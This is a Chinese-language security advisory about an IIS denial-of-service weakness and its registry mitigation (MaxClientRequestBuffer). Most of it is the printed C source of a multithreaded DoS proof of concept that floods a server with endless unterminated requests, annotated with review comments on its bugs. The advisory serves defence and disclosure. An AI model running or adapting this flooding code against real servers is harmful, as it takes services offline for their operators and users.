
      ASP漏洞區分與處理方法(5)


      17 IIS web server DOS

      漏洞描述:
      默認情況下,IIS容易受到拒絕服務攻擊。如果注冊表中名為 "MaxClientRequestBuffer" 的鍵尚未被創建,針對這種NT系統的攻擊通常能奏效。
      "MaxClientRequestBuffer" 這個鍵用于設置IIS允許接受的輸入量。如果將 "MaxClientRequestBuffer"
      設置為256(bytes),那么即使攻擊者發送大量字符,IIS接受的請求也將被限制在256字節以內。而系統的缺省設置對此不加限制,因此,利用
      下面的程序可以很容易地對IIS server實行DOS攻擊:

      #include <stdio.h>
      #include <windows.h>
      // Number of worker threads main() tries to start; each one runs cng().
      #define MAX_THREAD 666
      // Thread body, defined below. Declared with an empty parameter list even
      // though main() casts it to LPTHREAD_START_ROUTINE.
      void cng();
      // Target address string, taken from argv[1] and handed to inet_addr() in cng().
      char *server;
      // Payload buffer allocated in main() (17500 bytes) and sent repeatedly by cng().
      char *buffer;
      // Target TCP port, parsed from argv[2] with atoi().
      int port;
      // Index into main()'s handle array; its incremented value is also passed
      // as the (unused) thread argument.
      int counter = 0;
      // Number of threads currently inside cng(). Every thread updates it with a
      // plain ++/-- and main() polls it, with no synchronization between them.
      int current_threads = 0;
      // Entry point of the published proof-of-concept for the IIS request-buffer
      // denial of service described on this page: start Winsock, launch
      // MAX_THREAD threads running cng(), wait, then terminate the threads.
      // Arguments (per the usage string): argv[1] = server, argv[2] = port.
      //
      // For defenders: each thread opens one TCP connection and sends a request
      // line followed by filler bytes with no terminating blank line (see cng()),
      // so the observable pattern is many parallel connections from one source
      // whose request header never ends. The mitigation given on this page is the
      // MaxClientRequestBuffer registry limit.
      //
      // NOTE(review): two author comments and the banner string below are
      // hard-wrapped by the page; as printed, those lines are not valid C.
      int main(int argc, char **argv)
      {
      // Winsock version word passed to WSAStartup().
      WORD tequila;
      WSADATA data;
      int p;
      DWORD tid;
      // Sized 2000, but only the first MAX_THREAD (666) slots are read back below.
      HANDLE hThread[2000];
      //This code is as is and sucks as it is. Won't exit correctly and a lot
      of other fun things.
      //That I didn't want to take the time to do. So just ctrl+c out of the
      code.
      //Load up cnghack.exe 3 times for charm.
      printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my
      beloved.\"\n");
      // NOTE(review): only argc < 2 is rejected, yet argv[2] is read below. With
      // a single argument argv[2] is NULL and atoi(NULL) is undefined behaviour.
      if(argc<2){
      printf("Usage: %s [server] [port]\n",argv[0]);
      exit(1);
      }
      // The malloc() result is not checked and the memory is not initialised.
      buffer=malloc(17500);
      // NOTE(review): strlen() runs over the uninitialised allocation, which is
      // undefined behaviour; how many bytes get filled, and whether the buffer is
      // NUL-terminated for the later strlen() calls in cng(), is not determined
      // by this code.
      memset( buffer, 'A', strlen(buffer));
      server=argv[1];
      port=atoi(argv[2]);
      // Request Winsock version 1.1.
      tequila = MAKEWORD( 1, 1 );
      printf("Attempting to start winsock... ");
      if( (WSAStartup(tequila, &data)) !=0 ){
      printf("failed to start winsock.\n");
      exit(1);
      }
      else{
      printf("started winsock.\n\n");
      }

      counter = 0;
      // Start MAX_THREAD threads. The CreateThread() return value is not checked.
      // NOTE(review): counter is read as the array index and incremented in the
      // argument list of the same expression with no sequencing between the two,
      // so which slot receives each handle is not defined by the language.
      for(p = 0 ; p < MAX_THREAD ; ++p ){
      hThread[counter] = CreateThread(0,
      0,
      (LPTHREAD_START_ROUTINE) cng,
      ( void * )++counter,
      0,
      &tid);
      }
      // Give the threads time to start, then poll until no thread is inside
      // cng(). A thread that connects never leaves its send loop, so this wait
      // only ends if every thread failed at socket() or connect(); the author's
      // comment above says to stop the program with ctrl+c instead.
      Sleep(250);
      while( current_threads )
      Sleep(250);
      counter = 0;
      // The message is printed before the TerminateThread() calls are made.
      // Thread handles are never closed and buffer is never freed.
      printf("Terminated Threads.\n");
      while (counter < MAX_THREAD)
      {
      TerminateThread( hThread[counter], 0 );
      ++counter;
      }
      WSACleanup();
      return 0;
      }

      // Thread body: open one TCP connection to server:port, send the request
      // line "GET / HTTP/\r\n", then send the global buffer in an endless loop.
      // The argument CreateThread() passes is not received (empty parameter
      // list) and the function returns void although main() casts it to
      // LPTHREAD_START_ROUTINE. NOTE(review): that cast hides a mismatch with
      // the Win32 thread-start signature.
      // current_threads is incremented on entry and decremented on the two exit
      // paths, without synchronization against the other threads.
      void cng()
      {
      int SockFD=0, p;
      // Only sin_family, sin_port and sin_addr are assigned below; the rest of
      // the structure is left uninitialised.
      struct sockaddr_in DstSAin;
      // Request line with no HTTP version number. No blank line is ever sent
      // after it, so the request header is never terminated.
      char GETKILLED[]="GET / HTTP/\r\n";
      // Unused in this function.
      int die=1;
      printf("Entered CNG\n");
      ++current_threads;
      DstSAin.sin_family = AF_INET;
      DstSAin.sin_port = htons((u_short)port);
      // inet_addr() parses numeric IPv4 address text; its result is not checked.
      DstSAin.sin_addr.s_addr=inet_addr( server );
      if((SockFD = socket(AF_INET, SOCK_STREAM, 0)) < 0){
      printf("Failed to create socket\n");
      --current_threads;
      return;
      }
      // connect() returns 0 on success, so this branch is the connected path.
      // On failure execution falls through to the decrement below; the socket
      // is not closed on either path.
      if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
      {
      p=send(SockFD,GETKILLED,strlen(GETKILLED),0);
      printf("Step 1: %i\n", p);
      // Endless send loop: the length is strlen(buffer) recomputed on each
      // pass, and the send() result is printed but never acted on, so the
      // loop has no exit even when sends fail (the author's comment below
      // notes the missing check).
      for(;;){
      p=send(SockFD,buffer,strlen(buffer),0);
      printf("P: %i\n", p);
      //put in some code to check if send = -1 more then X times we drop
      the loop and exit the thread
      //bla bla bla i love the dirtiness of concept code.
      }
      }
      // Reached only when connect() fails, because the loop above never ends.
      --current_threads;
      printf("Exited CNG\n");
      return;
      }

      cnghack.c works by doing the following:
      Connects to example.com
      Sends: GET / HTTP/[return][buffer]

      Where:
      [return] is just an \r\n
      [buffer] is a never ending stream of A's

      攻擊結果將導致NT系統的CPU占用率達到 100%

      解決方案
      運行Regedt32.exe
      在:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters
      增加一個值:
      Value Name: MaxClientRequestBuffer
      Data Type: REG_DWORD
      設置為十進制
      具體數值設置為你想設定的IIS允許接受的URL最大長度(單位為字節)。
      CNNS的設置為256
      注意:數值過小可能使URL或請求頭較長的正常請求被拒絕,正式啟用前應先測試;修改注冊表後一般需要重新啟動IIS服務才能生效。
      (出處:熱點網絡)

